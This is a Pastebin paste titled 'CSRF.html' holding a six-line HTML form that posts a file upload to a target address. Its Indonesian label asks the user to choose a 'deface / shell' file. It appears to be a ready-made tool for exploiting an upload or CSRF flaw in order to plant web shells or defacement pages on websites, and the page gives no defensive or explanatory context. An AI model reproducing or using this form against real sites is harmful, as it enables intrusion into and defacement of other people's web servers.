Kyfx

CSRF.html

Dec 20th, 2015
626
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. <form enctype="multipart/form-data"
  2. action="http://localhost" method="post">
  3. <input type="jpg" name="url" value="./" /><br />
  4. Pilih File Deface / Shell Anda: <input name="uploadfile" type="file" /><br />
  5. <input type="submit" value="upload" />
  6. </form>
Add Comment
Please, Sign In to add comment